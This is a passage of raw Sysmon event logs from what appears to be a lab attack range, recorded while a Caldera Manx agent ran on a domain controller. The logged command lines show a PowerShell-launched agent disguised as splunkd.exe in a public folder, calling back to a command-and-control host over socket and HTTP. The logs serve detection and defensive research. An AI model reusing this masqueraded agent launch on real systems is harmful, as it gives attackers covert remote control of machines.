C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\\caldera_manx_agent.ps1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.170","ProcessGuid":"{41C8662E-1F69-5F25-0000-0010B7860200}","Image":"C:\\Users\\Public\\splunkd.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010923B0100}","ParentProcessId":"2112","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\\caldera_manx_agent.ps1","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1104,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010EE870200}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010EE870200}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1105,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: 꺠瘢翽\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nTargetProcessId: 2956\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\windows.storage.dll+164bbf|C:\\Windows\\System32\\windows.storage.dll+164835|C:\\Windows\\System32\\windows.storage.dll+164326|C:\\Windows\\System32\\windows.storage.dll+165798|C:\\Windows\\System32\\windows.storage.dll+16414e|C:\\Windows\\System32\\windows.storage.dll+10cfd5|C:\\Windows\\System32\\windows.storage.dll+10d354|C:\\Windows\\System32\\windows.storage.dll+10c990|C:\\Windows\\System32\\shell32.dll+e8b0f|C:\\Windows\\System32\\shell32.dll+e899c|C:\\Windows\\System32\\shell32.dll+e86ec|C:\\Windows\\System32\\shell32.dll+31537|C:\\Windows\\System32\\shell32.dll+31495|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+33903a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+276811|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+acd808|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+271e5f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffe0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffe0(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"꺠瘢翽","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010B7860200}","TargetProcessId":"2956","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\windows.storage.dll+164bbf|C:\\Windows\\System32\\windows.storage.dll+164835|C:\\Windows\\System32\\windows.storage.dll+164326|C:\\Windows\\System32\\windows.storage.dll+165798|C:\\Windows\\System32\\windows.storage.dll+16414e|C:\\Windows\\System32\\windows.storage.dll+10cfd5|C:\\Windows\\System32\\windows.storage.dll+10d354|C:\\Windows\\System32\\windows.storage.dll+10c990|C:\\Windows\\System32\\shell32.dll+e8b0f|C:\\Windows\\System32\\shell32.dll+e899c|C:\\Windows\\System32\\shell32.dll+e86ec|C:\\Windows\\System32\\shell32.dll+31537|C:\\Windows\\System32\\shell32.dll+31495|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+33903a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+276811|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+acd808|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+271e5f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffe0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffe0(wow64)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1106,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.221\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nTargetProcessId: 2956\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.221","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010B7860200}","TargetProcessId":"2956","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1107,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.221\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010BB890200}\r\nTargetProcessId: 3004\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.221","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010BB890200}","TargetProcessId":"3004","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1108,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.221\r\nSourceProcessGUID: {41C8662E-1F69-5F25-0000-0010BB890200}\r\nSourceProcessId: 3004\r\nSourceThreadId: 3032\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nTargetProcessId: 2956\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.221","SourceProcessGUID":"{41C8662E-1F69-5F25-0000-0010BB890200}","SourceProcessId":"3004","SourceThreadId":"3032","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010B7860200}","TargetProcessId":"2956","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1109,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.232\r\nProcessGuid: {41C8662E-1F69-5F25-0000-0010018A0200}\r\nProcessId: 3016\r\nImage: C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nFileVersion: 10.0.14393.3801 (rs1_release.200610-1742)\r\nDescription: Windows Modules Installer Worker\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: TiWorker.exe\r\nCommandLine: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=0CE9C52C23CA8BE3667A9FEFDE41FC15,SHA256=54B3EE99CA831ED9249669FDB9510CAF202F97ED816FA15D4B4791F86760C8E1,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.232","ProcessGuid":"{41C8662E-1F69-5F25-0000-0010018A0200}","Image":"C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","FileVersion":"10.0.14393.3801 (rs1_release.200610-1742)","Description":"Windows Modules Installer Worker","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"TiWorker.exe","CommandLine":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=0CE9C52C23CA8BE3667A9FEFDE41FC15,SHA256=54B3EE99CA831ED9249669FDB9510CAF202F97ED816FA15D4B4791F86760C8E1,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1110,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010018A0200}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010018A0200}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1111,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.221\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010018A0200}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.221","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010018A0200}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1112,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010018A0200}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 